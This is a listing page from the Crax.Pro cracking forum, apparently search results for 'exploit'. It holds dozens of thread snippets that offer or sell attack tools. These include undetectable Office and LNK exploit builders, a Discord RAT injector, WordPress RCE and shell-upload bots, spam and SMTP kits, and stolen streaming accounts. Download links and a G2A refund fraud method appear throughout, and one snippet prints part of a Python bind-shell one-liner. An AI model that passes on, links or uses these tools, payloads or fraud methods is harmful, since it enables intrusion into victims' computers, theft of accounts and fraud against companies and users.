Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!
  1. C0DE_PA1N

    [FREE FOR ALL]lnk Exploit By Me

    Tutorial : https://youtu.be/ZujxeaP0sVA https://www.mediafire.com/file/papu6m87456g6yd/lnk+exploit.zip/file pass : zebi
  2. blackc0d3

    Microsoft Office Exploit ( Exe > Doc ) FUD Silent 100%

    I offer Microsoft Office Exploit ( exe > doc ) FUD silent 100% for sale info : 1. Item name : Microsoft Office 2. Affected OS: Windows 7 32/64bit , Windows 8.1 32/64bit , windows 10 32/64bit 3. Vulnerable Target application versions and reliability. If 32 bit only, is 64 bit...
  3. Bl4ckc0d3

    Script/Site Bot WP  HQ Wordpress Exploit Package

    Best UHQ Wordpress Exploit AiO Package Exploit must working with python I recommend python3 and python2 installed both in machine because tools some different coder and exploit will be needed different version 2.7 and 3 Included Exploits : *** Hidden text: You do not have sufficient...
  4. CodeBoss

    Script/Site Bot SMTP  Wordpress Exploit

    After Some Weeks We Explain About WordPress plugin And Exploits We Found Some Bugs And We Collecting All Bugs And Adding On The Our New Exploit.. We Made New Exploit And Now We Updated The Exploit 10 IPS --> 15 IPS 4x Faster More plugin More exploit For Getting Shells Mailers SMTP Virus...
  5. X-Crack

    Multi/Others  NEW DISCORD EXPLOIT RAT INJECTOR - GET ACCESS TO PEOPLE'S PC -

    CREDITS: This tool was made by Hellyuri. HOW TO USE: This tool uses the new discord exploit. 1- Run the tool and open your chat with the victim (the victim needs to be online on discord). 2- Send any message to the victim (after that, the victim's picture should appear in the tool). 3- Click in...
  6. throvinus15

    Paid WP CP/Shell Priv8 Bot 0day WP New Exploit RCE 2022 2022-04-12

    🔥 Priv8 Bot 0day WP New Exploit RCE 2022🔥 New Exploit Wordpress RCE 2022🔥 💥 Have many fresh Priv8 RCE Exploit 💥 Can Get a Lot Shell everdays🔥 💥 No need: key, hwid, limit ip 💥 Only need password + sitelist => a lot Shells🔥 💥 Can use in unlimited RDP 💥Legit and Fast⚡ more info? @Throvinus...
  7. Leloup777

    Others  🤑1000$+/DAY | 500$ WORTH G2A REFUND METHOD | FREE GIFT CARDS AND GAME KEYS🤑

    So I bought this method from a private seller for a 50$ which I have been using for about 6 months, it’s a wonderful method so I thought why not to share it with you guys. Things that you will need know: You can’t use VPN - because otherwise g2a won’t allow you to create an order. G2A Instant...
  8. BIBIL

    Paid Config  Free | Alfa Rce Exploit by 0Day team

    BIBIL submitted a new resource: Free | Alfa Rce Exploit by 0Day team - AlfaRce Read more about this resource...
  9. BIBIL

    Paid Free | Alfa Rce Exploit by 0Day team 1

    📝Description: AlfaRce Exploit Free versions ------------------------------------------------------------------------------------- :pepehappy: Preview: [At least 2 screenshots/videos are required here, unless Config will be rejected] Screenshot with Free Proxies: No proxy required...
  10. jjjones

    Others  [Cracked]HTA-Exploit-Builder V.2

    [Cracked]HTA-Exploit-Builder v.2 Download And Execute File With Fud HTA Payload Clean (.HTA) Exploit Small Size Registry injection Image : LINK: https://mega.nz/file/hQJ0xLzA#-MkTsaraQ75FVJB6OtUGtY5wPx5PqjFsn3Tv30lZO9s
  11. mowan6

    Scama/Letter SMTP Shell CP  SPAMMING TOOLS, SHELLS, CPANELS, LEADS, MAILERS, SMTPS

    FRESH AND UPDATED TOOLS EVERYDAY. Fresh Accounts Paid and Unpaid like 200.000 dating sites.. Fresh Tools Shell, PHP Mailer, SSH, Leads, SMTP, Cpanel, RDP etc... Visit the site now: olux.cz Visit the site now: olux.cz Visit the site now: olux.cz
  12. mowan6

    SPAMMING TOOLS, SHELLS, MAILERS, SMTPS, CPANELS AND MORE

    FRESH AND UPDATED TOOLS EVERYDAY. Fresh Accounts Paid and Unpaid like 200.000 dating sites.. Fresh Tools Shell, PHP Mailer, SSH, Leads, SMTP, Cpanel, RDP etc... Visit the site now: olux.cz Visit the site now: olux.cz Visit the site now: olux.cz
  13. vevocracked00

    Trillium Security MultiSploit Tool V6.5.21 Full

    Trillium Security MultiSploit Tool v6.5.21 Full Multi Extensions Generator Including VB C++ FASM BATCH PowerShell HTML Java Script Python work on from windows 2000 to 10 all 32x 64x ========================================================================== ( vbs - all Office silent exploit...
  14. vevocracked00

    Trillium Security MultiSploit Tool V6.5.21 Full

    Trillium Security MultiSploit Tool v6.5.21 Full Multi Extensions Generator Including VB C++ FASM BATCH PowerShell HTML Java Script Python work on from windows 2000 to 10 all 32x 64x ========================================================================== ( vbs - all Office silent exploit...
  15. peebeekay

    Brute Multi/Others  Macro Office Exploit Builder - Spread Your Files EZ

    MacroPack Community is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. It also handles various shortcuts formats. This tool can be used for red teaming, pentests, demos, and social engineering assessments. MacroPack will...
  16. pwncore

    Log4j RCE Auto Scanner CVE-2021-44228

    Features Support for lists of URLs. Fuzzing for more than 60 HTTP request headers (not only 3-4 headers as previously seen tools). Fuzzing for HTTP POST Data parameters. Fuzzing for JSON data parameters. Supports DNS callback for vulnerability discovery and validation. WAF Bypass payloads...
  17. pwncore

    0day Log4j RCE Vulnerability ! ( 2021-44228 )

    New 0day RCE vuln, the whole world is affected check this out: https://t.me/vPwndCom/7703 POC: https://github.com/PwnC00re/Log4J_0day_RCE Join us : t.me/vPwnd
  18. sadirmonu

    Source Code  [HQ] ⚡️ DISCORD VOICECHAT LAG EXPLOIT ⚡️

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  19. кнαη

    0Day Lnk Exploit Exe To Doc By Jhassan Aly

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! *** Virus Report: 8
  20. r0otc0de

    Mailer SMTP Shell CP WP  Free Uploaders

    Free Uploaders using WP exploit *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  21. Kaasneger

    Mail Brute Multi/Others  Instagram 0 Day Exploit Get Into Ant

    https://anonfiles.com/RaQ3F8W6uf/Instagram_0_Day_Exploit_rar Intercept otp
  22. Sizebi

    New Bot Exploit Shell Zombie Bot 2021

    Zombie bot 2021 free https://ouo.io/JfISnE
  23. gems7

    Mail Brute Brute Multi/Others  Instagram 0 Day Exploit (get Access To Almost Any Account)

    https://anonfiles.com/b928adTduf/Instagram_0_Day_Exploit_rar 1. Put in username 2. Get OTP 3. reset pass 4. login
  24. 5alft

    Streaming  46X SLINGTV PREMIUM ACCOUNTS

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! *** *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  25. 5alft

    Streaming  X20 SLING TV PREMIUM ACCOUNTS

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  26. 5alft

    Streaming  X10 SLING TV PREMIUM ACCOUNTS

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  27. 5alft

    Streaming  X10 SLING TV PREMIUM ACCOUNT

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  28. Nicsx

    Bot Shell WP  Wordpress Auto Upload Shell In Plugin

    Ni hao! I want to share my bot about Wordpress, I see some people here looking for it Use Python2 to run and install bs4 before run (pip install bs4) Download: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! *** Virus Total...
  29. sitehunter

    Gr3eNoX Exploit Scanner SQLI/XSS/LFI/RFI V.10

    Download Link : https://www.mediafire.com/folder/tt2c9f534ave8/Gr3eNoXExploitScanner VirusTotal: https://www.virustotal.com/gui/file/a6aabc6342aa877eef9caa6812b8d834bc9af35b37fc7e2b51c7bbf71581916e Password Unrar is 1
  30. 5alft

    Streaming  AMAZON METHOD - WORK 100% - EXPLOIT
    5.00 star(s) 1 Rating

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  31. 5alft

    Streaming  X5 NORDVPN PREMIUM ACCOUNT - EXPLOIT

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  32. 5alft

    Streaming  150X UPLAY ACCOUNTS - EXPLOIT

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  33. 5alft

    Streaming  X1 NETFLIX PREMIUM ACCOUNT - EXPLOIT

  34. 5alft

    Streaming  X30 ORANGE.FR ACCOUNT - EXPLOIT

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  35. 5alft

    Streaming  X5 GeoGuessr ACCOUNT PREMIUM - EXPLOIT

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  36. 5alft

    Streaming  X200 THETA.TV ACCOUNTS | FULL CAPTURE - EXPLOIT

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  37. 5alft

    Streaming  X50 PSN ACCOUNTS MAIL ACCESS - Exploit

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  38. 5alft

    Streaming  X30 NETFLIX MAIL ACCESS - EXPLOIT

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ****** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  39. 5alft

    Streaming  X10 Disney Plus Account Premium - Exploit

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  40. Tobi

    Bot  All Tools In One

    TOOLS 🔍 DRUPAL HUNTER EXPLOITATION TOOL 🔍 # --= https://github.com/dr-iman/Drupal-Hunter ⏰ CMS DETECTOR v2 (WP, DUPAL, JOOMLA) ⏰ # --= https://github.com/dr-iman/cms-detector 🧙 WORDPRESS DETECTOR (VULN DORKER) 🧙 # --= https://github.com/dr-iman/Wordpress-detector 📑 PACKET STORM EXPLOIT LIST 📑 #...
  41. Amirxx60

    ALL-IN-ONE HACKING TOOL FOR HACKERS ADVANCED TOOLS AT ONE PLACE

    This is a collection which i use like on everyday basis. The knowledge is vast, keep learning. Give me a like and +rep if you liked it. Leechers get out. Foremost Warning: Noobs here? Dont even bother without having the tool knowledge. These tools are for the advanced linux users or who at...
  42. ChoKoLO_TN

    Validator SMTP Laravel WP CP/Shell JexBot New Version v6.3

    👨‍💻 Coder: <-------------------------------------------------------------------------------------> 📝Description: ✏️How to use? <-------------------------------------------------------------------------------------> :pepehappy: Screenshots...
  43. ChoKoLO_TN

    Validator SMTP Laravel WP CP/Shell Zombie Bot v14 [SMTP+CP+Shell+Laravel] v14

    👨‍💻 Coder: <-------------------------------------------------------------------------------------> 📝Description: 1) Zombi Bot V14 Scanner Pro 11) Viper 1337 private Scanner V2.0 2) Advance Mass Url Collector 12) Mass Shell Checker 3) Email Filter 13) Mass...
  44. Zayn1001

    BIN  python bind shell single line code for both Unix and Windows, used to finding and exploit RCE (ImageMagick, Ghostscript,

    Python one-liner bind shell [Payload] Note: Shell supports 'cd' command.(edited) [01:58] Payloads: [02:01] Unix: python -c "(lambda __g, __y, __contextlib: [[[[(s.bind(('0.0.0.0', 4242)), (s.listen(5), [(lambda __after: [[[(lambda __after: [__after() for __g['u'] in [('system32')]][0]...
  45. Lnx

    Jex v4 insane exploit bot ( leaked )

    *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  46. Lnx

    Shell  Any shell to exploit windows server and get rdp ?

    i have many vuln sites that was hosted on a windows server any method to exploit it and get rdp from it <3 #Crax4ever
  47. tostr2

    Others  NEW InstaGC Exploit - get a Google Play Gift code in 5-10 minutes

    NEW InstaGC Exploit - get a Google Play Gift code in 10 minutes, spend on Cryptotab Pro
  48. Thanos Crax

    Shell Method/TUT  How to Exploit Shell - Tutorial

    VIDEO TUTORIAL: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  49. Thanos Crax

    Bot SMTP Shell  NekoBot | Shell checker+Auto Exploiter [With 500+ Exploit 2000+ Shell]

    NekoBot | + shell checker Auto Exploiter With 500+ Exploit 2000+ Shell f e a t u r e s : 1- Cherry-Plugin 2- download-manager Plugin 3- wysija-newsletters 4- Slider Revolution [Revslider] 5- gravity-forms 6- userpro 7- wp-gdpr-compliance 8- wp-graphql 9- formcraft 10- Headway 11- Pagelines...
  50. Bl4ckc0d3

    Exploit Development ( Exclusive )

    ZDResearch – Exploit Development? ?Topics: ▪️1.Introduction ▪️2.Stack Exploitation ▪️3.Heap Exploitation ▪️4.Pointer Exploitation ▪️5.Protection Bypass ▪️6.Privilege Escalation ?Price: $1,099.99 Click Like to get : *** Hidden text: You do not have sufficient rights to view the hidden text...
Top Bottom